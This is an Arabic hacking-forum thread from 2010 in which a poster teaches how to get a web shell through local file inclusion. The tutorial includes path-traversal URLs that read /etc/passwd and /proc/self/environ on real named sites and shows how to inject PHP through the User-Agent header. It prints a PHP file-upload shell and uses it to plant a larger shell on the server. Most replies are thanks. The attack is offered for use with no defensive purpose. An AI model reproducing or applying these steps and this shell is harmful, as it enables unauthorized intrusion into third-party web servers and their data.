الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

KaLa$nikoV · 06-29-2010, 01:54 AM

السلام عليكم ورحمة الله وبركاته

موضوعنا اليوم عن الحصول على شل عن طريق ثغرات local file include

طبعا الثغره فعاله ومنتشره فى كتير جدا من السيرفرات

ولو دخلت على اى موقع ثغرات تلقاها اكتر من السكيول

لكن مفيش اهتمام بيها مش عارف ليه مع العلم ان استغلالاتها كتير

وانا كنت فاكر ان الطريقه معروفه لانها قديمه حبتين لكن اكتشفت ان كتير مش عارفينها

عموما نبدأ الشرح وهو سهل جدا لكن محتاج تركيز مش أكتر

الأدوات الأول

1 - متصفح فير فوكس (أكيد عند كله)

2 - إضافة mozilla sniffer

https://addons.mozilla.org/en-US/firefox/addon/176005/

3 - فتح دماغك معايا شويه بس

نبدأ الشرح

ده مثال لموقع مصاب بثغرة lfi

http://www.iowaarboretum.org/index.p.../etc/passwd%00

وده موقع للتطبيق فى حالتنا

http://falalalalights.net/site/index...elf/environ%00

على سبيل المثال لا الحصر

نشوف هنعمل ايه

أول حاجه اعرف ان لما بتطلب ملف بى اتش بى من السيرفر فيه عمليه جديده بتبدأ وبتتحفظ فى ملف /proc خاص بيها (مش مهم)

المهم دلوقت ان السيرفرات بيبقى فيها مجلد بالعنوان ده /proc/self/environ بيحتوى على معلومات عن العمليات الأخيره اللى حصلت

احنا بقى هنعمل ايه

هنحقن المجلد ده بشل بسيط الاوا
وعن طريق الشل البسيط نرفع شل كبير

نشوف ازاى

ده المسار اللى بنجيب منه اليوزرات

http://www.site.com/index.php?option.../etc/passwd%00

وخلى بالك من علامة %00 اللى فى الاخر دى

مهمه جدا

طيب بعد منطلب الملف ده النتيجه هتبقى كده

[

تمام لحد كده الموقع مصاب وزى الفل

نشوف بقى /proc/self/environ متفعله او لا لانها مش موجوده فى كل السيرفرات

ازاى بقى يا حلو
هنغير /etc/passwd ب /proc/self/environ
http://www.site.com/index.php?option...elf/environ%00

لو كان الناتج زى كده

يبقى متفعله وزى الفل

طبعا هتلاقى كلام كتير لكن ده فى اول الصفحه وزى منت شايف محتوى على user_agent وده اهم حاجه دلوقت

طيب لو مظهرش كده وظهر فور بيدن او صفحه بيضه

يبقة كده مش متفعل وشوف سايت تانى بقى او استنى للدرس الجى هتشوف فيه مفاجأه

اوك

لقيناه متفعل هنعمل ايه

نحقن الشل تبعنا فيه وهتشوف ازاى لكن الاول حاول تنقى شل خفيف وانا هستخدم ده
مجرد فورم ابلو مش اكتر نرفع بيه الشل الكبير بتاعنا

كود:

<?php
echo '<b><br><br>'.php_u****().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" ****="uploader" id="uploader">';
echo '<input type="file" ****="file" size="50"><input ****="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
    if(@copy($_FILES['file']['tmp_****'], $_FILES['file']['****'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }
    else { echo '<b>Upload GAGAL !!!</b><br><br>'; }
}
?>

تم ارفاق الشل

نشوف بقى هنحقنه ازاى

بعد متسطب الاداه mozilla sniffer

تفتحها من الفاير فوكس عن طريق tools > mozilla sniffer

وبعدين تضغط start sniff

طبعا ناس هتقول اداة التامبر بتقضى نفس الغرض

اقولك لو جربت تغبر الاجينت بالتامبر هيديك ايرور ومش هتشتغل لكن السنيفر شغاله بدون مشاكل lol
طيب

ضغطنا start sniff
افتح بقى السايت تانى طبعا السايت ده

http://www.site.com/index.php?option...elf/environ%00

واختار tamper

تلقى جاك حاجه زى دى

لاحظ المحدد بازرق اللى هو user agent

حط مكانه كود الشل الموجود فوق

واتكى ok

تمام كده تلاقى الصفحه ظهر فيها فورم رفع
زى ده

لول

ارفع الشل تبعك بس وانت مشغل السنيفر برضه متقفلهاش

بعد متضغط ابلود
اضغط tamper تانى وحط نفس الكود اللى حطيته قبل كده اللى هو تبع الرفع

واضغط اوك

تمام كده انا رفعت الشل باسم faris.php

تروح بقى على السايت مباشر وتضيف يعدها اسم الشل

توضيح
انا كنت شغال هنا
http://www.site.com/index.php?option...elf/environ%00

يبقى الشل هنا

http://www.site.com/faris.php

والنتيجه

مبروووك

lol

انتهى الشرح
اتمنى يكون واضح
وأى استفسارات انا جاهز

HaCKeR-MaN k:

نسخ لصق
-------
ahmed_100022
عالم المعرفه

المصدر: :: vBspiders Professional Network ::

hgpw,g ugn ag uk 'vdr eyvhj local file include hglkjavi f;evi

D-GhosT s3cur!Ty-Z · 06-29-2010, 05:11 AM

thank you

Q2-FOX2R · 06-29-2010, 09:58 AM

مشكووورين على الشرح الاكثر من رائع
بس الثغرات دي صارت نادرة
و ان وجدت ما تنفع كثير
بسبب اصدار البي آتش بي 5.x

بس تزبط بالاصدار 4.x با>ن الله

the sn!per · 06-29-2010, 11:08 AM

[align=center][/align]مشكور اخ volc4no على الشرح الرائع بانتظار جديدك دائما

mobdeen · 06-29-2010, 11:17 PM

والله شرح وافي وكافي بس ما ينفع الا مع قليل

mr.ft · 06-30-2010, 12:26 PM

مشكووووووووووور يعطيك الف عافيه

hakar-mosos · 09-09-2011, 04:22 AM

مشكور اخي على المعلومه الحلوه

Mr GbX · 09-09-2011, 02:49 PM

شكرا لك يا غالي

جيم 5 · 09-09-2011, 04:01 PM

شكرا يا عسل

zero cool1 · 09-09-2011, 05:23 PM

thxxxxxxxxxxxxxxxxxxxxxxxxxx

atttt · 09-16-2011, 04:09 AM

a;vhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh

simon007 · 09-16-2011, 06:48 AM

thxxxxxxxxxxxxxxxxxxxxxxxxxx

pain sama · 09-17-2011, 06:38 PM

شكراا لك حبيبي الغالي !!

عبد الله ر · 09-28-2011, 05:04 PM

مشكور اخي فولكانو

ssmba · 09-29-2011, 05:02 PM

god men pro

المواضيع المتشابهه
الموضوع	كاتب الموضوع	المنتدى	مشاركات	آخر مشاركة
Uploading Shell Through Local File Inclusion ( LFI ) priv8	D4rK	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	4	12-09-2018 01:50 AM
كيفية رفع الشيل عبر ثغرات File Include	R.B.G.ALORD	قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات	13	08-11-2013 05:28 AM
حقن شيل فى ثغرات SQL Injection عن طريق Into Out File	Dr.Alaa	SQL قواعد البيانات	3	09-13-2009 07:11 AM

التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام

الحصول على شل عن طريق ثغرات local file include المنتشره بكثره

قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات